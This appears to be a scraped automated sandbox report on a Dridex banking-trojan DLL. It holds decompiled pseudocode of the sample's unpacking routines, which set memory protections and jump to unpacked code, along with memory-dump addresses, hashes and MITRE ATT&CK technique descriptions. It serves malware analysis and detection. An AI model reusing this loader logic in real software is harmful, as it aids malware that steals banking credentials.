						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6ed91448
0x6ed9144f
0x6ed91452
0x6ed91459
0x6ed91bdb
0x6ed91bdb
0x6ed9145f
0x6ed9146a
0x6ed919a9
0x6ed919ad
0x00000000
0x6ed91c2c
0x6ed919b3
0x6ed919b6
0x6ed919b9
0x6ed919c3
0x6ed919d2
0x6ed919d4
0x6ed919db
0x6ed91bc5
0x6ed91bc7
0x6ed91bca
0x6ed91bce
0x00000000
0x6ed91bce
0x6ed919ea
0x6ed919f5
0x6ed919fc
0x6ed919ff
0x6ed91a01
0x6ed91a04
0x6ed91a07
0x6ed91a0d
0x6ed91a1b
0x6ed91a2b
0x6ed91a50
0x6ed91a61
0x6ed91a64
0x6ed91a66
0x6ed91aca
0x6ed91acd
0x6ed91acd
0x6ed91acf
0x6ed91ad2
0x6ed91ad6
0x6ed91ad6
0x6ed91ada
0x00000000
0x00000000
0x6ed91ae7
0x6ed91aed
0x6ed91b21
0x6ed91b27
0x6ed91b29
0x6ed91bf8
0x6ed91c00
0x6ed91c03
0x6ed91c05
0x6ed91c1c
0x6ed91c1c
0x6ed91c07
0x6ed91c0b
0x6ed91c10
0x6ed91c10
0x6ed91c1e
0x6ed91c24
0x6ed91b43
0x6ed91b43
0x6ed91b45
0x6ed91b45
0x6ed91b47
0x6ed91b47
0x6ed91b4c
0x00000000
0x00000000
0x6ed91b4e
0x6ed91b4f
0x6ed91b52
0x6ed91b55
0x00000000
0x00000000
0x6ed91b61
0x6ed91b64
0x6ed91b66
0x6ed91b7d
0x6ed91b7d
0x6ed91b68
0x6ed91b6c
0x6ed91b71
0x6ed91b71
0x6ed91b8a
0x6ed91b8d
0x6ed91b96
0x6ed91b99
0x6ed91bbc
0x6ed91bc0
0x00000000
0x6ed91bc0
0x6ed91ba1
0x6ed91ba1
0x6ed91bad
0x6ed91bb0
0x6ed91bb9
0x00000000
0x6ed91bb9
0x6ed91b2f
0x6ed91b3f
0x6ed91b3f
0x6ed91b41
0x00000000
0x00000000
0x6ed91b37
0x6ed91b39
0x6ed91b39
0x00000000
0x6ed91b3f
0x6ed91aef
0x6ed91af7
0x6ed91b17
0x6ed91af9
0x6ed91af9
0x6ed91b01
0x6ed91b0a
0x6ed91b0a
0x6ed91b01
0x00000000
0x6ed91af7
0x6ed91a68
0x6ed91a6f
0x00000000
0x00000000
0x6ed91a7c
0x6ed91a82
0x6ed91a87
0x6ed91a8e
0x6ed91a92
0x6ed91aa7
0x6ed91aa9
0x6ed91aab
0x6ed91ab1
0x6ed91abf
0x6ed91abf
0x6ed91ac5
0x00000000
0x6ed91ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed91a0f
0x6ed91a0f
0x6ed91a0f
0x6ed91a10
0x6ed91a13
0x6ed91a17
0x00000000
0x6ed91a2d
0x6ed91a30
0x6ed91a33
0x6ed91a3c
0x6ed91a3f
0x6ed91a40
0x6ed91a42
0x00000000
0x6ed9147d
0x6ed9147f
0x6ed91484
0x6ed9148f
0x6ed9149d
0x6ed914b0
0x6ed914bd
0x6ed914c6
0x6ed914ca
0x6ed914ce
0x6ed91516
0x6ed91516
0x6ed91518
0x6ed9151f
0x00000000
0x00000000
0x6ed91538
0x6ed91540
0x6ed91544
0x6ed91559
0x6ed9155d
0x6ed91561
0x6ed9156a
0x6ed91570
0x6ed91573
0x6ed91577
0x6ed9157f
0x6ed91581
0x6ed91585
0x6ed9158c
0x6ed91595
0x6ed91595
0x6ed91599
0x6ed915ae
0x6ed915c4
0x6ed915d1
0x6ed915d2
0x6ed915d2
0x6ed915d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed9158e
0x6ed9158e
0x6ed9158e
0x6ed9158f
0x6ed91590
0x00000000
0x6ed9158e
0x6ed91553
0x6ed91557
0x00000000
0x00000000
0x00000000
0x6ed915d8
0x6ed915d8
0x6ed915d9
0x6ed915dc
0x6ed915e6
0x6ed915e6
0x6ed915ea
0x6ed915f1
0x6ed9164c
0x6ed91651
0x6ed916a4
0x6ed916a4
0x6ed916a8
0x6ed916ac
0x6ed914d6
0x6ed914d9
0x6ed914de
0x6ed914e4
0x6ed914e7
0x6ed914ee
0x6ed914f2
0x6ed914f9
0x6ed91502
0x6ed91506
0x6ed9150a
0x6ed91510
0x00000000
0x00000000
0x00000000
0x6ed91510
0x6ed916b6
0x6ed916c2
0x6ed916cd
0x6ed916d4
0x6ed916dd
0x6ed916e7
0x6ed916e8
0x6ed916f6
0x6ed916fb
0x6ed916fc
0x6ed91709
0x6ed9170e
0x6ed91720
0x6ed91725
0x6ed9172a
0x6ed9173c
0x6ed9174e
0x6ed91753
0x6ed9175e
0x6ed91765
0x6ed9176a
0x6ed91772
0x6ed9177b
0x6ed9177b
0x6ed91787
0x6ed9178e
0x6ed9179a
0x6ed917a6
0x6ed917b4
0x6ed917c5
0x6ed917cc
0x6ed917d1
0x6ed917da
0x6ed917df
0x6ed917e1
0x6ed917e5
0x6ed917e9
0x6ed917f6
0x6ed91803
0x6ed91807
0x6ed9181b
0x6ed9181f
0x00000000
0x00000000
0x6ed91834
0x6ed91836
0x6ed9183e
0x6ed9183b
0x6ed9183b
0x6ed9183b
0x6ed91842
0x6ed91844
0x6ed9184a
0x6ed91850
0x6ed918ac
0x6ed918b5
0x6ed918b9
0x6ed918c6
0x6ed918cf
0x6ed918d4
0x6ed918d8
0x6ed918db
0x6ed9193c
0x6ed91952
0x6ed9195d
0x6ed9195e
0x6ed9195f
0x6ed91963
0x6ed91966
0x6ed91be6
0x6ed91be9
0x6ed91be9
0x00000000
0x6ed91966
0x6ed918e5
0x6ed918f5
0x6ed918fe
0x6ed91907
0x6ed91910
0x6ed91911
0x6ed91912
0x6ed91917
0x6ed9191f
0x6ed91927
0x00000000
0x00000000
0x00000000
0x6ed91929
0x6ed91859
0x6ed9185e
0x6ed91862
0x6ed91862
0x6ed91866
0x6ed91869
0x00000000
0x00000000
0x6ed9188a
0x6ed9188c
0x6ed91890
0x6ed91892
0x00000000
0x00000000
0x6ed91894
0x6ed9189b
0x6ed918a7
0x00000000
0x6ed918a7
0x6ed9186e
0x00000000
0x6ed9196c
0x6ed9196c
0x6ed9196d
0x6ed9197d
0x6ed91989
0x6ed91992
0x6ed9199b
0x6ed919a4
0x00000000
0x6ed919a4
0x6ed91653
0x6ed91655
0x6ed91657
0x6ed9165c
0x6ed91661
0x6ed91674
0x6ed9168a
0x6ed91693
0x6ed91694
0x6ed91694
0x6ed91696
0x6ed91697
0x6ed9169a
0x6ed9169e
0x00000000
0x6ed91657
0x6ed915f3
0x6ed915fd
0x6ed915fe
0x6ed915fe
0x6ed9160b
0x6ed91617
0x6ed91619
0x6ed9161b
0x6ed9161f
0x6ed9162f
0x6ed9162f
0x6ed91636
0x6ed91639
0x6ed9163a
0x6ed9163e
0x6ed91648
0x00000000
0x6ed91648

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e63210a054760e7b63b964a113740d84ef90966fadc01f4507425df0fc74f527
Instruction ID: 1bb60264bea2a9de69d6903a40c3009763cc86d418f317eb459b205112ada19c
Opcode Fuzzy Hash: e63210a054760e7b63b964a113740d84ef90966fadc01f4507425df0fc74f527
Instruction Fuzzy Hash: 8E329B70108345CFD710DFA8C890A9FB7E9BF95308F118D2DE5958B2A1EB30E949DB62

Uniqueness

Uniqueness Score: -1.00%

Function 6ED86D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED86D0C() {

				 *0x6ed9d280 = GetUserNameW;
				 *0x6ED9D284 = MessageBoxW;
				 *0x6ED9D288 = GetLastError;
				 *0x6ED9D28C = CreateFileA;
				 *0x6ED9D290 = DebugBreak;
				 *0x6ED9D294 = FlushFileBuffers;
				 *0x6ED9D298 = FreeEnvironmentStringsA;
				 *0x6ED9D29C = GetConsoleOutputCP;
				 *0x6ED9D2A0 = GetEnvironmentStrings;
				 *0x6ED9D2A4 = GetLocaleInfoA;
				 *0x6ED9D2A8 = GetStartupInfoA;
				 *0x6ED9D2AC = GetStringTypeA;
				 *0x6ED9D2B0 = HeapValidate;
				 *0x6ED9D2B4 = IsBadReadPtr;
				 *0x6ED9D2B8 = LCMapStringA;
				 *0x6ED9D2BC = LoadLibraryA;
				 *0x6ED9D2C0 = OutputDebugStringA;
				return 0x6ed9d280;
			}

0x6ed86d1d
0x6ed86d25
0x6ed86d28
0x6ed86d37
0x6ed86d3a
0x6ed86d49
0x6ed86d4c
0x6ed86d5b
0x6ed86d5e
0x6ed86d6d
0x6ed86d70
0x6ed86d7f
0x6ed86d82
0x6ed86d91
0x6ed86d94
0x6ed86da3
0x6ed86da6
0x6ed86da9

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c13d9412e5bc359ac6355de2b15281dc1aa303717bc1787a40f7a05d644f0c6
Instruction ID: 0c5d7cd20f3cc64d65d8eaa77d7ec25514dce6915173883d06128159f14acf33
Opcode Fuzzy Hash: 5c13d9412e5bc359ac6355de2b15281dc1aa303717bc1787a40f7a05d644f0c6
Instruction Fuzzy Hash: 5911F3B9E15A10CFDB58CF09D9908517BF1FB8E31131281AAD80D8B369D734D846DF54

Uniqueness

Uniqueness Score: -1.00%

Function 6ED8BB44, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6ED8BB44(intOrPtr* __ecx) {
				void* _t1;
				void* _t2;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E6ED8C280(__ecx);
				if(_t1 == 0) {
					_t2 = E6ED93064(0x60a28c5c, 0xe96b154c);
					if(_t2 != 0) {
						_push( *_t4);
						asm("int3");
						asm("int3");
					}
					 *_t4 = 0;
					return _t2;
				}
				return _t1;
			}

0x6ed8bb45
0x6ed8bb47
0x6ed8bb4e
0x6ed8bb5a
0x6ed8bb61
0x6ed8bb63
0x6ed8bb65
0x6ed8bb66
0x6ed8bb66
0x6ed8bb67
0x00000000
0x6ed8bb67
0x6ed8bb6e

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07604e7cfcd7805719c03ee9caa2803b83987aefb0ef9c1b2756fd2519e18e65
Instruction ID: cf5ecc14b94f39b47e4475bd66fbeb02461a1bcf45af3a162c5ad35ab41b5f15
Opcode Fuzzy Hash: 07604e7cfcd7805719c03ee9caa2803b83987aefb0ef9c1b2756fd2519e18e65
Instruction Fuzzy Hash: 9FD02238000202B9EF640FE6BC00F07B7288F81294F200C22E9002749CEFB4E0204034

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4884 Parent PID: 4756 rundll32.exeCOMMON

Executed Functions

Function 00A411ED, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00A411ED(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				char* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				int _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t137;
				int _t143;
				int _t151;
				int _t155;
				int _t182;
				unsigned int _t199;
				intOrPtr _t221;
				intOrPtr _t223;
				void* _t231;
				intOrPtr _t234;
				void* _t241;
				intOrPtr _t245;
				intOrPtr _t252;
				DWORD* _t265;
				void* _t269;
				intOrPtr* _t272;
				intOrPtr* _t273;

				_t137 = _a4;
				_v44 = 0;
				_t241 =  *((intOrPtr*)(_t137 + 0x38));
				 *0xa44418 = 1;
				asm("movaps xmm0, [0xa43010]");
				asm("movups [0xa44428], xmm0");
				_v48 = _t137;
				_v52 =  *((intOrPtr*)(_t137 + 0x20));
				_v56 =  *((intOrPtr*)(_v48 + 0x1c));
				_v188 = _t241;
				_v184 =  *((intOrPtr*)(_t137 + 0x18));
				_v180 = 4;
				_v176 =  &_v44;
				_v60 =  *((intOrPtr*)(_v48 + 0xc));
				_v64 = 4;
				_v68 = _t241;
				_v72 =  &_v44;
				_t143 = VirtualProtect(__edi, __ebx, __esi, _t265); // executed
				_v76 = _t143;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x18));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v44;
				_v92 = 0;
				E00A42798();
				E00A417A5(_v68,  *_v48, _v52);
				E00A42798( *_v48, 0, _v52);
				_t151 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t272 = _t269 - 0x8c;
				_t231 = _v68;
				_t252 =  *((intOrPtr*)(_t231 + 0x3c));
				_v96 = _t151;
				_v100 = _v68 + 0x3c;
				_v104 = _t231;
				_v108 = _t252;
				if(_t252 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v104;
				if(_v60 != 0) {
					_v148 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					_v152 = 0;
					while(1) {
						_t221 = _v148;
						_t199 =  *(_t221 + 0x24);
						_v156 = _v152;
						_v160 = _t199 >> 0x0000001e & 0x00000001;
						_v164 = _t199 >> 0x1f;
						_v188 = _v68 +  *((intOrPtr*)(_t221 + 0xc));
						_v184 =  *((intOrPtr*)(_t221 + 8));
						_v180 =  *((intOrPtr*)(0xa44418 + (_v160 << 4) + (_v164 << 3) + ((_t199 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v44;
						_v168 = _t221;
						_t182 = VirtualProtect(??, ??, ??, ??); // executed
						_t272 = _t272 - 0x10;
						_t223 = _v156 + 1;
						_v172 = _t182;
						_v148 = _v168 + 0x28;
						_v152 = _t223;
						if(_t223 == _v60) {
							goto L5;
						}
					}
				}
				L5:
				 *_t272 = _v68;
				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x14));
				_t155 = DisableThreadLibraryCalls(??);
				_t273 = _t272 - 4;
				_t234 =  *_v100;
				_v140 = _t155;
				_v136 = _t234;
				_v112 = _v68;
				if(_t234 == 0) {
					L2:
					_t245 = _v48;
					_v40 =  *((intOrPtr*)(_t245 + 0x34));
					_v36 =  *((intOrPtr*)(_t245 + 8));
					_v32 =  *((intOrPtr*)(_t245 + 0x30));
					_v28 =  *((intOrPtr*)(_t245 + 0x28));
					_v24 =  *((intOrPtr*)(_t245 + 0x50));
					_v20 = _v116;
					 *_t273 = _t245;
					_v188 = 0;
					_v184 = 0x74;
					_v120 =  &_v40;
					_v124 = 0;
					_v128 = 0x74;
					_v132 =  *((intOrPtr*)(_v112 + 0x28));
					E00A42798();
					if(_v132 != 0) {
						_t272 =  *((intOrPtr*)( &_v40 + 0x10));
						goto __eax;
					}
					return 1;
				} else {
					_v112 = _v68 + (_v136 + 0x0000ffff & 0x0000ffff) + 1;
					goto L2;
				}
			}

0x00a411f9
0x00a41207
0x00a4120e
0x00a41211
0x00a4121b
0x00a41222
0x00a4122c
0x00a41232
0x00a4123b
0x00a41244
0x00a41247
0x00a4124b
0x00a41253
0x00a4125a
0x00a4125d
0x00a41260
0x00a41263
0x00a41266
0x00a41280
0x00a41286
0x00a41289
0x00a41291
0x00a41295
0x00a41298
0x00a4129b
0x00a4129e
0x00a412a1
0x00a412bc
0x00a412d8
0x00a412fd
0x00a412ff
0x00a41308
0x00a4130b
0x00a41315
0x00a41318
0x00a4131b
0x00a4131e
0x00a41321
0x00a41535
0x00a41535
0x00a4143f
0x00a41445
0x00a4140d
0x00a41413
0x00a4146c
0x00a41472
0x00a41484
0x00a41487
0x00a41495
0x00a414a6
0x00a414cf
0x00a414d2
0x00a414d6
0x00a414da
0x00a414e1
0x00a414e7
0x00a414e9
0x00a414f2
0x00a41503
0x00a41509
0x00a4150f
0x00a41515
0x00000000
0x00000000
0x00a4151b
0x00a4146c
0x00a413b8
0x00a413c6
0x00a413ce
0x00a413d1
0x00a413d3
0x00a413d9
0x00a413e5
0x00a413eb
0x00a413f1
0x00a413f4
0x00a4132c
0x00a4133c
0x00a41342
0x00a41348
0x00a4134e
0x00a41354
0x00a4135a
0x00a41360
0x00a41363
0x00a41366
0x00a4136e
0x00a41376
0x00a41379
0x00a4137c
0x00a4137f
0x00a41382
0x00a4138d
0x00a41429
0x00a4142f
0x00a4142f
0x00a41466
0x00a413fa
0x00a413b0
0x00000000
0x00a413b0

APIs

VirtualProtect.KERNELBASE ref: 00A41266
VirtualProtect.KERNELBASE ref: 00A412FD
VirtualProtect.KERNELBASE ref: 00A414E7

Strings

t, xrefs: 00A4136E

Memory Dump Source

Source File: 00000003.00000002.350707930.0000000000A40000.00000040.00000010.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: de0625684d037db5b20bad11b2774efce23c3f2c5f82e399a9ea4f1a882a44c3
Instruction ID: 8428287d2e8ec42bd656923616fbcfd7efd33854cd5a56ee7e941a344499227c
Opcode Fuzzy Hash: de0625684d037db5b20bad11b2774efce23c3f2c5f82e399a9ea4f1a882a44c3
Instruction Fuzzy Hash: 28B1AEB8D002188FDB14CF98C980A9DFBF1FF88314F5585AAE949AB351D335A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A41D08, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00A41D76

Memory Dump Source

Source File: 00000003.00000002.350707930.0000000000A40000.00000040.00000010.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
Instruction ID: 51f7e78563425c33d76ce93e2068cbda58459519d4017ef56b0c7475ecefe13c
Opcode Fuzzy Hash: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
Instruction Fuzzy Hash: B241E5B5E0521A9FDB04DF98D490AAEBBF0FF88314F15852DE849AB340D375A844CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report hMUh2Mkqyi.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6ED90730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6ED92234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6ED92820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6ED93138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00AC11ED, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230
memoryCOMMON

Function 6ED910A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6ED957B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6ED95B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 00AC1A6A, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6ED95BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6ED95BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6ED95BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6ED95BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6ED95C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6ED95E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6ED95E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 6ED9564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6ED91030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6ED93628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6ED81494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6ED8A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6ED88428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6ED99370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6ED9143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6ED86D0C, Relevance: .0, Instructions: 36
COMMON

Function 6ED8BB44, Relevance: .0, Instructions: 16
COMMON

Function 00A411ED, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230
memoryCOMMON